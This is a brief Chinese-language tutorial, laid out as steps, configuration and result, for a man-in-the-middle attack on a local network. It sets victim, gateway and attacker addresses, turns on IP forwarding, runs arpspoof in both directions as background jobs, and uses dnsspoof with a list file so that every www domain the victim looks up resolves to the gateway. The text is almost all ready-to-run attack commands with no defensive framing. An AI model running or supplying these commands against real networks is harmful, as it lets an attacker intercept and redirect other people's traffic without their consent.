步骤
<pre>
//网关:192.168.2.1
//受害者:192.168.2.150
//攻击者:192.168.2.202
//开启路由转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward
//告诉受害者(192.168.2.150 ),网关(192.168.2.1)在我这里(192.168.2.202)
nohup arpspoof -t 192.168.2.150 192.168.2.1 >/dev/null &
//告诉网关(192.168.2.1),受害者(192.168.2.150 )在我这里(192.168.2.202)
nohup arpspoof -t 192.168.2.1 192.168.2.150 >/dev/null &
dnsspoof -f dnsspoof_list.txt host 192.168.2.150 and udp port 53
</pre>
配置
<pre>
//典型的dnsspoof_list.txt的内容
192.168.2.1 www*
</pre>
结果
如果攻击成功,那么从受害者的机器访问任意www域名均会被解析到网关的地址。